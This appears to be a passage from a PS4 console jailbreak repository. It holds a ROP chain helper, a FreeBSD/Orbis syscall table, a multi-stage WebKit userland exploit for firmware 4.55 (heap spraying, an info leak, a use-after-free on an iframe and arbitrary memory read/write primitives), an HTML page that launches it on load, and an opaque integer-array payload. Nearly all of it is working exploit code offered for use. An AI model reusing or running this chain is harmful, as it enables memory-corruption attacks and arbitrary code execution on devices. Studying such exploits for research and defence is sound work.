110 |     if (rdx != undefined) {
111 |       this.push(gadgets["pop rdx"]); // pop rdx
112 |       this.push(rdx); // what
113 |     }
114 |     if (rcx != undefined) {
115 |       this.push(gadgets["pop rcx"]); // pop r10
116 |       this.push(rcx); // what
117 |     }
118 |     if (r8 != undefined) {
119 |       this.push(gadgets["pop r8"]); // pop r8
120 |       this.push(r8); // what
121 |     }
122 |     if (r9 != undefined) {
123 |       this.push(gadgets["pop r9"]); // pop r9
124 |       this.push(r9); // what*/
125 |     }
126 | 
127 |     this.push(rip); // jmp
128 |     return this;
129 |   }
130 |   
131 |   this.run = function() {
132 |       var retv = p.loadchain(this, this.notimes);
133 |       this.clear();
134 |       return retv;
135 |   }
136 |   
137 |   return this;
138 | };


--------------------------------------------------------------------------------
/PS4Exploit/data/ftpsyscalls.js:
--------------------------------------------------------------------------------
  1 | window.nameforsyscall = swapkeyval(window.syscallnames);
  2 | window.syscalls       = {};
  3 | 
  4 | /* Get syscall name by index */
  5 | function swapkeyval(json){
  6 |   var ret = {};
  7 |   for(var key in json){
  8 |     if (json.hasOwnProperty(key)) {
  9 |       ret[json[key]] = key;
 10 |     }
 11 |   }
 12 |   return ret;
 13 | }
 14 | 
 15 | /* A long ass map of system call names -> number, you shouldn't need to touch this */
 16 | window.syscallnames =
 17 | {
 18 |   "sys_exit": 1,
 19 |   "sys_fork": 2,
 20 |   "sys_read": 3,
 21 |   "sys_write": 4,
 22 |   "sys_open": 5,
 23 |   "sys_close": 6,
 24 |   "sys_wait4": 7,
 25 |   "sys_unlink": 10,
 26 |   "sys_chdir": 12,
 27 |   "sys_chmod": 15,
 28 |   "sys_getpid": 20,
 29 |   "sys_setuid": 23,
 30 |   "sys_getuid": 24,
 31 |   "sys_geteuid": 25,
 32 |   "sys_recvmsg": 27,
 33 |   "sys_sendmsg": 28,
 34 |   "sys_recvfrom": 29,
 35 |   "sys_accept": 30,
 36 |   "sys_getpeername": 31,
 37 |   "sys_getsockname": 32,
 38 |   "sys_access": 33,
 39 |   "sys_chflags": 34,
 40 |   "sys_fchflags": 35,
 41 |   "sys_sync": 36,
 42 |   "sys_kill": 37,
 43 |   "sys_stat": 38,
 44 |   "sys_getppid": 39,
 45 |   "sys_dup": 41,
 46 |   "sys_pipe": 42,
 47 |   "sys_getegid": 43,
 48 |   "sys_profil": 44,
 49 |   "sys_getgid": 47,
 50 |   "sys_getlogin": 49,
 51 |   "sys_setlogin": 50,
 52 |   "sys_sigaltstack": 53,
 53 |   "sys_ioctl": 54,
 54 |   "sys_reboot": 55,
 55 |   "sys_revoke": 56,
 56 |   "sys_execve": 59,
 57 |   "sys_msync": 65,
 58 |   "sys_munmap": 73,
 59 |   "sys_mprotect": 74,
 60 |   "sys_madvise": 75,
 61 |   "sys_mincore": 78,
 62 |   "sys_getgroups": 79,
 63 |   "sys_setgroups": 80,
 64 |   "sys_setitimer": 83,
 65 |   "sys_getitimer": 86,
 66 |   "sys_getdtablesize": 89,
 67 |   "sys_dup2": 90,
 68 |   "sys_fcntl": 92,
 69 |   "sys_select": 93,
 70 |   "sys_fsync": 95,
 71 |   "sys_setpriority": 96,
 72 |   "sys_socket": 97,
 73 |   "sys_connect": 98,
 74 |   "sys_getpriority": 100,
 75 |   "sys_send": 101,
 76 |   "sys_recv": 102,
 77 |   "sys_bind": 104,
 78 |   "sys_setsockopt": 105,
 79 |   "sys_listen": 106,
 80 |   "sys_recvmsg": 113,
 81 |   "sys_sendmsg": 114,
 82 |   "sys_gettimeofday": 116,
 83 |   "sys_getrusage": 117,
 84 |   "sys_getsockopt": 118,
 85 |   "sys_readv": 120,
 86 |   "sys_writev": 121,
 87 |   "sys_settimeofday": 122,
 88 |   "sys_fchmod": 124,
 89 |   "sys_recvfrom": 125,
 90 |   "sys_setreuid": 126,
 91 |   "sys_setregid": 127,
 92 |   "sys_rename": 128,
 93 |   "sys_flock": 131,
 94 |   "sys_sendto": 133,
 95 |   "sys_shutdown": 134,
 96 |   "sys_socketpair": 135,
 97 |   "sys_mkdir": 136,
 98 |   "sys_rmdir": 137,
 99 |   "sys_utimes": 138,
100 |   "sys_adjtime": 140,
101 |   "sys_getpeername": 141,
102 |   "sys_setsid": 147,
103 |   "sys_sysarch": 165,
104 |   "sys_setegid": 182,
105 |   "sys_seteuid": 183,
106 |   "sys_fstat": 189,
107 |   "sys_lstat": 190,
108 |   "sys_pathconf": 191,
109 |   "sys_fpathconf": 192,
110 |   "sys_getrlimit": 194,
111 |   "sys_setrlimit": 195,
112 |   "sys_getdirentries": 196,
113 |   "sys___sysctl": 202,
114 |   "sys_mlock": 203,
115 |   "sys_munlock": 204,
116 |   "sys_futimes": 206,
117 |   "sys_poll": 209,
118 |   "sys_clock_gettime": 232,
119 |   "sys_clock_settime": 233,
120 |   "sys_clock_getres": 234,
121 |   "sys_ktimer_create": 235,
122 |   "sys_ktimer_delete": 236,
123 |   "sys_ktimer_settime": 237,
124 |   "sys_ktimer_gettime": 238,
125 |   "sys_ktimer_getoverrun": 239,
126 |   "sys_nanosleep": 240,
127 |   "sys_rfork": 251,
128 |   "sys_issetugid": 253,
129 |   "sys_getdents": 272,
130 |   "sys_preadv": 289,
131 |   "sys_pwritev": 290,
132 |   "sys_getsid": 310,
133 |   "sys_aio_suspend": 315,
134 |   "sys_mlockall": 324,
135 |   "sys_munlockall": 325,
136 |   "sys_sched_setparam": 327,
137 |   "sys_sched_getparam": 328,
138 |   "sys_sched_setscheduler": 329,
139 |   "sys_sched_getscheduler": 330,
140 |   "sys_sched_yield": 331,
141 |   "sys_sched_get_priority_max": 332,
142 |   "sys_sched_get_priority_min": 333,
143 |   "sys_sched_rr_get_interval": 334,
144 |   "sys_utrace": 335,
145 |   "sys_sigprocmask": 340,
146 |   "sys_sigprocmask": 340,
147 |   "sys_sigsuspend": 341,
148 |   "sys_sigpending": 343,
149 |   "sys_sigtimedwait": 345,
150 |   "sys_sigwaitinfo": 346,
151 |   "sys_kqueue": 362,
152 |   "sys_kevent": 363,
153 |   "sys_uuidgen": 392,
154 |   "sys_sendfile": 393,
155 |   "sys_fstatfs": 397,
156 |   "sys_ksem_close": 400,
157 |   "sys_ksem_post": 401,
158 |   "sys_ksem_wait": 402,
159 |   "sys_ksem_trywait": 403,
160 |   "sys_ksem_init": 404,
161 |   "sys_ksem_open": 405,
162 |   "sys_ksem_unlink": 406,
163 |   "sys_ksem_getvalue": 407,
164 |   "sys_ksem_destroy": 408,
165 |   "sys_sigaction": 416,
166 |   "sys_sigreturn": 417,
167 |   "sys_getcontext": 421,
168 |   "sys_setcontext": 422,
169 |   "sys_swapcontext": 423,
170 |   "sys_sigwait": 429,
171 |   "sys_thr_create": 430,
172 |   "sys_thr_exit": 431,
173 |   "sys_thr_self": 432,
174 |   "sys_thr_kill": 433,
175 |   "sys_ksem_timedwait": 441,
176 |   "sys_thr_suspend": 442,
177 |   "sys_thr_wake": 443,
178 |   "sys_kldunloadf": 444,
179 |   "sys__umtx_op": 454,
180 |   "sys__umtx_op": 454,
181 |   "sys_thr_new": 455,
182 |   "sys_sigqueue": 456,
183 |   "sys_thr_set_name": 464,
184 |   "sys_rtprio_thread": 466,
185 |   "sys_pread": 475,
186 |   "sys_pwrite": 476,
187 |   "sys_mmap": 477,
188 |   "sys_lseek": 478,
189 |   "sys_truncate": 479,
190 |   "sys_ftruncate": 480,
191 |   "sys_thr_kill2": 481,
192 |   "sys_shm_open": 482,
193 |   "sys_shm_unlink": 483,
194 |   "sys_cpuset_getid": 486,
195 |   "sys_cpuset_getaffinity": 487,
196 |   "sys_cpuset_setaffinity": 488,
197 |   "sys_openat": 499,
198 |   "sys_pselect": 522,
199 | 
200 |   "sys_regmgr_call": 532,
201 |   "sys_jitshm_create": 533,
202 |   "sys_jitshm_alias": 534,
203 |   "sys_dl_get_list": 535,
204 |   "sys_dl_get_info": 536,
205 |   "sys_dl_notify_event": 537,
206 |   "sys_evf_create": 538,
207 |   "sys_evf_delete": 539,
208 |   "sys_evf_open": 540,
209 |   "sys_evf_close": 541,
210 |   "sys_evf_wait": 542,
211 |   "sys_evf_trywait": 543,
212 |   "sys_evf_set": 544,
213 |   "sys_evf_clear": 545,
214 |   "sys_evf_cancel": 546,
215 |   "sys_query_memory_protection": 47,
216 |   "sys_batch_map": 548,
217 |   "sys_osem_create": 549,
218 |   "sys_osem_delete": 550,
219 |   "sys_osem_open": 551,
220 |   "sys_osem_close": 552,
221 |   "sys_osem_wait": 553,
222 |   "sys_osem_trywait": 554,
223 |   "sys_osem_post": 555,
224 |   "sys_osem_cancel": 556,
225 |   "sys_namedobj_create": 557,
226 |   "sys_namedobj_delete": 558,
227 |   "sys_set_vm_container": 559,
228 |   "sys_debug_init": 560,
229 |   "sys_suspend_process": 561,
230 |   "sys_resume_process": 562,
231 |   "sys_opmc_enable": 563,
232 |   "sys_opmc_disable": 564,
233 |   "sys_opmc_set_ctl": 565,
234 |   "sys_opmc_set_ctr": 566,
235 |   "sys_opmc_get_ctr": 567,
236 |   "sys_budget_create": 568,
237 |   "sys_budget_delete": 569,
238 |   "sys_budget_get": 570,
239 |   "sys_budget_set": 571,
240 |   "sys_virtual_query": 572,
241 |   "sys_mdbg_call": 573,
242 |   "sys_sblock_create": 574,
243 |   "sys_sblock_delete": 575,
244 |   "sys_sblock_enter": 576,
245 |   "sys_sblock_exit": 577,
246 |   "sys_sblock_xenter": 578,
247 |   "sys_sblock_xexit": 579,
248 |   "sys_eport_create": 580,
249 |   "sys_eport_delete": 581,
250 |   "sys_eport_trigger": 582,
251 |   "sys_eport_open": 583,
252 |   "sys_eport_close": 584,
253 |   "sys_is_in_sandbox": 585,
254 |   "sys_dmem_container": 586,
255 |   "sys_get_authinfo": 587,
256 |   "sys_mname": 588,
257 |   "sys_dynlib_dlopen": 589,
258 |   "sys_dynlib_dlclose": 590,
259 |   "sys_dynlib_dlsym": 591,
260 |   "sys_dynlib_get_list": 592,
261 |   "sys_dynlib_get_info": 593,
262 |   "sys_dynlib_load_prx": 594,
263 |   "sys_dynlib_unload_prx": 595,
264 |   "sys_dynlib_do_copy_relocations": 596,
265 |   "sys_dynlib_prepare_dlclose": 597,
266 |   "sys_dynlib_get_proc_param": 598,
267 |   "sys_dynlib_process_needed_and_relocate": 599,
268 |   "sys_sandbox_path": 600,
269 |   "sys_mdbg_service": 601,
270 |   "sys_randomized_path": 602,
271 |   "sys_rdup": 603,
272 |   "sys_dl_get_metadata": 604,
273 |   "sys_workaround8849": 605,
274 |   "sys_is_development_mode": 606,
275 |   "sys_get_self_auth_info": 607,
276 |   "sys_dynlib_get_info_ex": 608,
277 |   "sys_budget_get_ptype": 610,
278 |   "sys_budget_getid": 609,
279 |   "sys_get_paging_stats_of_all_threads": 611,
280 |   "sys_get_proc_type_info": 612,
281 |   "sys_get_resident_count": 613,
282 |   "sys_prepare_to_suspend_process": 614,
283 |   "sys_get_resident_fmem_count": 615,
284 |   "sys_thr_get_name": 616,
285 |   "sys_set_gpo": 617,
286 |   "sys_thr_suspend_ucontext": 632,
287 |   "sys_thr_resume_ucontext": 633,
288 |   "sys_thr_get_ucontext": 634
289 | }
290 | 


--------------------------------------------------------------------------------
/PS4Exploit/data/ftpuserland.js:
--------------------------------------------------------------------------------
  1 | /////////////////// UTILITY STUFF ///////////////////
  2 | 
  3 | function makeid() {
  4 |   var text = "";
  5 |   var possible = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
  6 |     
  7 |   for( var i=0; i < 8; i++ )
  8 |   text += possible.charAt(Math.floor(Math.random() * possible.length));
  9 |     
 10 |   return text;
 11 | };
 12 | 
 13 | var instancespr = [];
 14 | 
 15 | for(var i=0; i<2048; i++) {
 16 |   instancespr[i] = {};
 17 |   instancespr[i][makeid()] = 50057; /* spray 4-field Object InstanceIDs */
 18 | }
 19 | for(var i=2048; i<4096; i++) {
 20 |   instancespr[i] = new Uint32Array(1);
 21 |   instancespr[i][makeid()] = 50057; /* spray 4-field Object InstanceIDs */
 22 | }
 23 | 
 24 | var _dview;
 25 | 
 26 | function u2d(low, hi) {
 27 |   if (!_dview) _dview = new DataView(new ArrayBuffer(16));
 28 |   _dview.setUint32(0, hi);
 29 |   _dview.setUint32(4, low);
 30 |   return _dview.getFloat64(0);
 31 | }
 32 | 
 33 | function int64(low,hi) {
 34 |   this.low = (low>>>0);
 35 |   this.hi = (hi>>>0);
 36 | 
 37 |   this.add32inplace = function(val) {
 38 |     var new_lo = (((this.low >>> 0) + val) & 0xFFFFFFFF) >>> 0;
 39 |     var new_hi = (this.hi >>> 0);
 40 | 
 41 |     if (new_lo < this.low) {
 42 |       new_hi++;
 43 |     }
 44 | 
 45 |     this.hi=new_hi;
 46 |     this.low=new_lo;
 47 |   }
 48 | 
 49 |   this.add32 = function(val) {
 50 |     var new_lo = (((this.low >>> 0) + val) & 0xFFFFFFFF) >>> 0;
 51 |     var new_hi = (this.hi >>> 0);
 52 | 
 53 |     if (new_lo < this.low) {
 54 |       new_hi++;
 55 |     }
 56 | 
 57 |     return new int64(new_lo, new_hi);
 58 |   }
 59 | 
 60 |   this.sub32 = function(val) {
 61 |     var new_lo = (((this.low >>> 0) - val) & 0xFFFFFFFF) >>> 0;
 62 |     var new_hi = (this.hi >>> 0);
 63 | 
 64 |     if (new_lo > (this.low) & 0xFFFFFFFF) {
 65 |       new_hi--;
 66 |     }
 67 | 
 68 |     return new int64(new_lo, new_hi);
 69 |   }
 70 | 
 71 |   this.sub32inplace = function(val) {
 72 |     var new_lo = (((this.low >>> 0) - val) & 0xFFFFFFFF) >>> 0;
 73 |     var new_hi = (this.hi >>> 0);
 74 | 
 75 |     if (new_lo > (this.low) & 0xFFFFFFFF) {
 76 |       new_hi--;
 77 |     }
 78 | 
 79 |     this.hi=new_hi;
 80 |     this.low=new_lo;
 81 |   }
 82 | 
 83 |   this.and32 = function(val) {
 84 |     var new_lo = this.low & val;
 85 |     var new_hi = this.hi;
 86 |     return new int64(new_lo, new_hi);
 87 |   }
 88 | 
 89 |   this.and64 = function(vallo, valhi) {
 90 |     var new_lo = this.low & vallo;
 91 |     var new_hi = this.hi & valhi;
 92 |     return new int64(new_lo, new_hi);
 93 |   }
 94 | 
 95 |   this.toString = function(val) {
 96 |     val = 16;
 97 |     var lo_str = (this.low >>> 0).toString(val);
 98 |     var hi_str = (this.hi >>> 0).toString(val);
 99 | 
100 |     if(this.hi == 0)
101 |       return lo_str;
102 |     else
103 |       lo_str = zeroFill(lo_str, 8)
104 | 
105 |     return hi_str+lo_str;
106 |   }
107 | 
108 |   this.toPacked = function() {
109 |     return {hi: this.hi, low: this.low};
110 |   }
111 | 
112 |   this.setPacked = function(pck) {
113 |     this.hi=pck.hi;
114 |     this.low=pck.low;
115 |     return this;
116 |   }
117 |     
118 |   return this;
119 | }
120 | 
121 | function zeroFill(number, width ) {
122 |     width -= number.toString().length;
123 | 
124 |     if (width > 0) {
125 |         return new Array(width + (/\./.test( number ) ? 2 : 1)).join('0') + number;
126 |     }
127 | 
128 |     return number + ""; // always return a string
129 | }
130 | 
131 | var nogc = [];
132 | 
133 | /////////////////// STAGE 1: INFOLEAK ///////////////////
134 | 
135 | failed = false
136 | 
137 | // Spray a bunch of JSObjects on the heap for stability
138 | for(var i = 0; i < 0x4000; i++) {
139 |   nogc.push({a: 0, b: 0, c: 0, d: 0});
140 | }
141 | 
142 | // Target JSObject for overlap
143 | var tgt = {a: 0, b: 0, c: 0, d: 0}
144 | 
145 | for(var i = 0; i < 0x400; i++) {
146 |   nogc.push({a: 0, b: 0, c: 0, d: 0});
147 | }
148 | 
149 | var y = new ImageData(1, 0x4000)
150 | postMessage("", "*", [y.data.buffer]);
151 | 
152 | // Spray properties to ensure object is fastmalloc()'d and can be found easily later
153 | var props = {};
154 | 
155 | for(var i = 0; (i < (0x4000 / 2));) {
156 |   props[i++] = {value: 0x42424242};
157 |   props[i++] = {value: tgt};
158 | }
159 | 
160 | // Find address of JSValue by leaking one of the JSObject's we sprayed
161 | var foundLeak   = undefined;
162 | var foundIndex  = 0;
163 | var maxCount    = 0x100;
164 | 
165 | // Only check 256 times, should rarely fail
166 | while(foundLeak == undefined && maxCount > 0) {
167 |   maxCount--;
168 | 
169 |   history.pushState(y, "");
170 | 
171 |   Object.defineProperties({}, props);
172 | 
173 |   var leak = new Uint32Array(history.state.data.buffer);
174 | 
175 |   // Check memory against known values such as 0x42424242 JSValue and empty JSObject values
176 |   for(var i = 0; i < leak.length - 6; i++) {
177 |     if(
178 |       leak[i]       == 0x42424242 &&
179 |       leak[i + 0x1] == 0xFFFF0000 &&
180 |       leak[i + 0x2] == 0x00000000 &&
181 |       leak[i + 0x3] == 0x00000000 &&
182 |       leak[i + 0x4] == 0x00000000 &&
183 |       leak[i + 0x5] == 0x00000000 &&
184 |       leak[i + 0x6] == 0x0000000E &&
185 |       leak[i + 0x7] == 0x00000000 &&
186 |       leak[i + 0xA] == 0x00000000 &&
187 |       leak[i + 0xB] == 0x00000000 &&
188 |       leak[i + 0xC] == 0x00000000 &&
189 |       leak[i + 0xD] == 0x00000000 &&
190 |       leak[i + 0xE] == 0x0000000E &&
191 |       leak[i + 0xF] == 0x00000000
192 |     ) {
193 |       foundIndex = i;
194 |       foundLeak = leak;
195 |       break;
196 |     }
197 |   }
198 | }
199 | 
200 | // Oh no :(
201 | if(!foundLeak) {
202 |   failed = true
203 |   fail("Failed to find leak!")
204 | }
205 | 
206 | // Get first JSValue
207 | var firstLeak = Array.prototype.slice.call(foundLeak, foundIndex, foundIndex + 0x40);
208 | var leakJSVal = new int64(firstLeak[8], firstLeak[9]);
209 | leakJSVal.toString();
210 | 
211 | // Spray and clear 
212 | for(var i = 0; i < 0x4000; i++) {
213 |   var lol = {a: 0, b: 0, c: 0, d: 0};
214 | }
215 | 
216 | // Force garbage collection via memory pressure
217 | var dgc = function() {
218 |   for (var i = 0; i < 0x100; i++) {
219 |     new ArrayBuffer(0x100000);
220 |   }
221 | }
222 | 
223 | /////////////////// STAGE 2: UAF ///////////////////
224 | 
225 | // Userland pwnage
226 | function exploit() {
227 |   if(failed) {
228 |     return;
229 |   }
230 | 
231 |   try {
232 |     var src = document.createAttribute('src');
233 |     src.value = 'javascript:parent.callback()';
234 |       
235 |     var d = document.createElement('div');
236 | 
237 |     // Sandwich our target iframe
238 |     for(var i = 0; i < 0x4000; i++) {
239 |       nogc.push(document.createElement('iframe'));
240 |     }
241 | 
242 |     var f = document.body.appendChild(document.createElement('iframe'));
243 | 
244 |     for(var i = 0; i < 0x4000; i++) {
245 |       nogc.push(document.createElement('iframe'));
246 |     }
247 | 
248 |     // Free the iframe!
249 |     window.callback = () => {
250 |       window.callback = null;
251 |       
252 |       d.setAttributeNodeNS(src);
253 |       f.setAttributeNodeNS(document.createAttribute('src'));
254 |     };
255 | 
256 |     f.name = "lol";
257 |     f.setAttributeNodeNS(src);
258 |     f.remove();
259 |     
260 |     f = null;
261 |     src = null;
262 |     nogc.length=0;
263 |     dgc();
264 | 
265 |     /////////////////// STAGE 3: HEAP SPRAY ///////////////////
266 | 
267 |     // Setup spray variables
268 |     var objSpray  = 0x10000;
269 |     var objSz     = 0x90;
270 |     var objs      = new Array(objSpray);
271 | 
272 |     // Spray the heap with MarkedArgumentBuffers to corrupt iframe JSObject's backing memory. ImageData does this well.
273 |     for(var i = 0; i < objSpray; i++) {
274 |       objs[i] = new ImageData(1, objSz / 4);
275 |     }
276 | 
277 |     for(var i = 0; i < objSpray; i++) {
278 |       objs[i] = new Uint32Array(objs[i].data.buffer);
279 |     }
280 | 
281 |     /////////////////// STAGE 4: MISALIGNING JSVALUES ///////////////////
282 | 
283 |     var craftptr = leakJSVal.sub32(0x10000 - 0x10)
284 |     tgt.b = u2d(0,craftptr.low); // 0x10000 is offset due to double encoding
285 |     tgt.c = craftptr.hi;
286 |     tgt.a = u2d(2048, 0x1602300);
287 | 
288 |     /////////////////// STAGE 3 - CONTINUED ///////////////////
289 | 
290 |     // Memory corruption ; not even once!
291 |     for (var i=0; i<objSpray; i++)
292 |     {
293 |       // The poor butterflies :(
294 |       objs[i][2] = leakJSVal.low + 0x18 + 4;
295 |       objs[i][3] = leakJSVal.hi;
296 |     }
297 | 
298 |     /////////////////// STAGE 5: READ/WRITE PRIMITIVE ///////////////////
299 | 
300 |     // Retrieve stale reference and setup primitive helpers
301 |     var stale   = d.attributes[0].ownerElement;
302 |     var master  = new Uint32Array(0x1000);
303 |     var slave   = new Uint32Array(0x1000);
304 |     var leakval_u32     = new Uint32Array(0x1000);
305 |     var leakval_helper  = [slave, 2, 3, 4, 5, 6, 7, 8, 9, 10];
306 | 
307 |     // Create fake ArrayBufferView
308 |     tgt.a = u2d(4096, 0x1602300);
309 |     tgt.b = 0;
310 |     tgt.c = leakval_helper;
311 |     tgt.d = 0x1337;
312 | 
313 |     // Save old butterfly
314 |     var butterfly = new int64(stale[2], stale[3]);
315 | 
316 |     // Set leakval_u32's vector to leakval_helper's butterfly
317 |     tgt.c = leakval_u32;
318 |     var lkv_u32_old = new int64(stale[4], stale[5]);
319 |     
320 |     stale[4] = butterfly.low;
321 |     stale[5] = butterfly.hi;
322 | 
323 |     // Setup read/write primitive
324 |     tgt.c = master;
325 |     stale[4] = leakval_u32[0];
326 |     stale[5] = leakval_u32[1];
327 |     
328 |     var addr_to_slavebuf = new int64(master[4], master[5]);
329 |     tgt.c = leakval_u32;
330 |     stale[4] = lkv_u32_old.low;
331 |     stale[5] = lkv_u32_old.hi;
332 | 
333 |     // Restore proper JSValues
334 |     for (var i=0; i<objSpray; i++)
335 |     {
336 |       objs[i][2] = 0x41414141;
337 |       objs[i][3] = 0xFFFF0000;
338 |     }
339 | 
340 |     // Don't need these anymore
341 |     tgt.c = 0;
342 |     stale = 0;
343 | 
344 |     // Primitives :D
345 |     var prim = {
346 |       write8: function(addr, val) {
347 |         master[4] = addr.low;
348 |         master[5] = addr.hi;
349 | 
350 |         if (val instanceof int64) {
351 |           slave[0] = val.low;
352 |           slave[1] = val.hi;
353 |         } else {
354 |           slave[0] = val;
355 |           slave[1] = 0;
356 |         }
357 | 
358 |         master[4] = addr_to_slavebuf.low;
359 |         master[5] = addr_to_slavebuf.hi;
360 |       },
361 | 
362 |       write4: function(addr, val) {
363 |         master[4] = addr.low;
364 |         master[5] = addr.hi;
365 | 
366 |         slave[0] = val;
367 | 
368 |         master[4] = addr_to_slavebuf.low;
369 |         master[5] = addr_to_slavebuf.hi;
370 |       },
371 | 
372 |       read8: function(addr) {
373 |         master[4] = addr.low;
374 |         master[5] = addr.hi;
375 | 
376 |         var rtv = new int64(slave[0], slave[1]);
377 | 
378 |         master[4] = addr_to_slavebuf.low;
379 |         master[5] = addr_to_slavebuf.hi;
380 | 
381 |         return rtv;
382 |       },
383 | 
384 |       read4: function(addr)
385 |       {
386 |         master[4] = addr.low;
387 |         master[5] = addr.hi;
388 | 
389 |         var rtv = slave[0];
390 | 
391 |         master[4] = addr_to_slavebuf.low;
392 |         master[5] = addr_to_slavebuf.hi;
393 | 
394 |         return rtv;
395 |       },
396 | 
397 |       leakval: function(jsval)
398 |       {
399 |         leakval_helper[0] = jsval;
400 |         var rtv = this.read8(butterfly);
401 |         this.write8(butterfly, new int64(0x41414141, 0xffffffff));
402 |           
403 |         return rtv;
404 |       },
405 | 
406 |       createval: function(jsval)
407 |       {
408 |         this.write8(butterfly, jsval);
409 |         var rt = leakval_helper[0];
410 |         this.write8(butterfly, new int64(0x41414141, 0xffffffff));
411 |         return rt;
412 |       }
413 |     };
414 | 
415 |     window.primitives = prim;
416 | 
417 |     postExploit();
418 |   } catch(e) {
419 |     failed = true
420 |     fail("Exception: " + e)
421 |   }
422 | 
423 |   /*setTimeout(function() {
424 |     sc = document.createElement("script");
425 |     sc.src="kernel.js";
426 |     document.body.appendChild(sc);
427 |   }, 100);*/
428 | }


--------------------------------------------------------------------------------
/PS4Exploit/data/henindex.html:
--------------------------------------------------------------------------------
  1 | <!DOCTYPE html>
  2 | <html>
  3 | <head>
  4 |   <title>PS4Brew 4.55 (HEN)</title>
  5 |   <meta name="viewport" content="width=device-width, initial-scale=1">
  6 |   <style>
  7 |     .loader {
  8 |       position: absolute;
  9 |       left: 50%;
 10 |       top: 50%;
 11 |       margin: -75px 0 0 -75px;
 12 | 
 13 |       border: 10px solid #f3f3f3;
 14 |       border-radius: 50%;
 15 |       border-top: 10px solid #044595;
 16 |       border-left: 10px solid #044595;
 17 |       width: 120px;
 18 |       height: 120px;
 19 | 
 20 |       -webkit-animation: spin 1s linear infinite;
 21 |     }
 22 | 
 23 |     .info {
 24 |       overflow: hidden;
 25 |       position: fixed;
 26 |       position: absolute;
 27 |       top: 50%;
 28 |       left: 50%;
 29 | 
 30 |       font-size: 45px;
 31 |       font-family: sans-serif;
 32 | 
 33 |       transform: translate(-50%, -50%);
 34 |     }
 35 | 
 36 |     .credits {
 37 |       overflow: hidden;
 38 |       position: fixed;
 39 |       position: absolute;
 40 |       top: 90%;
 41 |       left: 50%;
 42 | 
 43 |       font-size: 16px;
 44 |       font-family: sans-serif;
 45 |       text-align: center;
 46 | 
 47 |       transform: translate(-50%, -90%);
 48 |     }
 49 | 
 50 |     @-webkit-keyframes spin {
 51 |       0% { -webkit-transform: rotate(0deg); }
 52 |       100% { -webkit-transform: rotate(360deg); }
 53 |     }
 54 |   </style>
 55 | </head>
 56 | 
 57 | <body onload="runExploit()" style="margin:0;">
 58 |   <div id="loader" class="loader"></div>
 59 | 
 60 |   <div id="allset" class="info" style="display:none;">
 61 |     You're all set!
 62 |   </div>
 63 | 
 64 |   <div id="fail" class="info" style="display:none;">
 65 |     Something went wrong :(
 66 |   </div>
 67 | 
 68 |   <div id="badfw" class="info" style="display:none;">
 69 |     Only firmware 4.55 is supported!
 70 |   </div>
 71 | 
 72 |   <div id="footer" class="credits">
 73 |     <ul style="list-style: none;padding-left:0">
 74 |       <li><a href="#">qwertyoruiopz</a></li>
 75 |       <li><a href="#">flatz</a></li>
 76 |       <li><a href="#">specter</a></li>
 77 |       <li><a href="#">xvortex</a></li>
 78 |       <li>anonymous contributors</li>
 79 |     </ul>
 80 |   </div>
 81 | 
 82 |   <script>
 83 |     function runExploit() {
 84 |       setTimeout(exploit, 1500);
 85 |     }
 86 | 
 87 |     function allset() {
 88 |       document.getElementById("loader").style.display = "none";
 89 |       document.getElementById("allset").style.display = "block";
 90 |     }
 91 | 
 92 |     function fail(info) {
 93 |       document.getElementById("loader").style.display = "none";
 94 |       document.getElementById("fail").style.display = "block";
 95 | 
 96 |       alert(info)
 97 |     }
 98 |   </script>
 99 | 
100 |   <script src="ftprop.js"></script>
101 |   <script src="ftpsyscalls.js"></script>
102 |   <script src="ftploader.js"></script>
103 |   <script src="henpayload.js"></script>
104 |   <script src="ftpuserland.js"></script>
105 |   <script src="ftpkernel.js"></script>
106 | </body>
107 | </html>
108 | 


--------------------------------------------------------------------------------
/PS4Exploit/data/henpayload.js:
--------------------------------------------------------------------------------
1 | var payload = [285673,2303218432,3967895802,512,389385544,1207959579,3224496009,504763903,2303197184,8503270,369033216,7600,12878152,1526726658,3234285763,4,574185,3234285568,5,571113,3234285568,6,568041,3234285568,10,564969,3234285568,21,561897,3234285568,136,558825,3234285568,478,555753,3234285568,11,552681,898451456,7456,1032669266,6800,1426442056,29,3892314112,1172,712294533,4248145224,1207959580,444415373,2112356352,2231369732,1209234624,484849037,2370306048,1734973,73852928,1032519680,7380,353733960,1207959581,443757965,1105723392,2332033028,1882941,361580544,7436,1647676744,3892314138,1064,480394635,2370306048,1889045,2370328576,1728821,68086016,1163067392,826657073,835269056,1224094162,441400717,369033216,7372,2098564424,1207959580,441660813,3280535552,3723020169,2298478595,361580767,7396,1094028616,3892314138,968,2370363273,1879829,898451456,6705,242664,1222609152,473044365,2370306048,1712949,60745728,3750297600,1695911240,1207959580,437597581,2313682944,2298478595,361580767,7288,137727304,3892314138,884,1213980553,477238669,2370306048,1702453,56551680,1463877632,1430345281,1398101057,418153288,33465,1211240384,2336805769,3242723414,155721955,2207074499,32192104,608471368,4291330824,265454920,82308,713771008,4294966968,1653296383,3984934920,19694607,2202599424,2249132028,290,1144044104,1498173249,961040449,2232352853,270,816549196,1291833194,1832956813,2168979473,2168606915,537870592,4169747655,4294911304,571473918,3136696768,16384,4292839752,1813269,3800648704,1223592264,369090441,6964,1418053185,3942662659,596938058,16383,1222543688,136608907,14844232,1224736704,3221284481,129630207,1090519040,3326203647,1107514501,2336781568,2236090437,2618193344,2336815710,2236092485,3945559488,1351436342,3892398096,1926510921,1217087718,3380955144,2336808308,3531950096,21812596,3229829354,344541200,1222830859,1209028749,961144833,1446736852,571425181,1166756039,3292088600,2236102262,1211200704,3224486657,686543871,138971976,1959363912,3925953754,1222609224,2202588969,2370310336,2314932044,2336751946,3531950096,3152796277,2202583089,1566251204,1564564545,1598119489,2336773059,2193164359,1220542464,1279291531,256393355,3515435058,412519240,1207959553,1210114497,2370357257,3479842968,71747583,0,542407,1207959552,3355429251,5190,88604672,1890608,711,2336751616,60403859,1451837441,1224094000,4197487499,2303263258,2303270992,2336757840,77975,331302912,0,1211629824,3210246793,1006895104,1615497544,1749715272,537907455,3263776960,4293034312,268435199,3192439330,440,1027140352,3498478464,2148794806,3067128203,2340422401,28758186,3364585473,16889552,1895269319,77,2210856960,5078913,0,4108354503,3224436841,2303234243,1657998771,3223457536,3277570097,3968026707,4230998032,3286827007,838860796,1032669430,4294967029,4294709480,264275455,43909,1032669184,5970,4294692072,1032669439,5980,4294689000,33537791,2370306048,1520957,4224182272,4290707455,1207959553,389692813,3068657664,838860795,1091960768,1207959577,3224486793,252904,2311095552,1213822211,75892109,2303197184,93004804,5692,60847136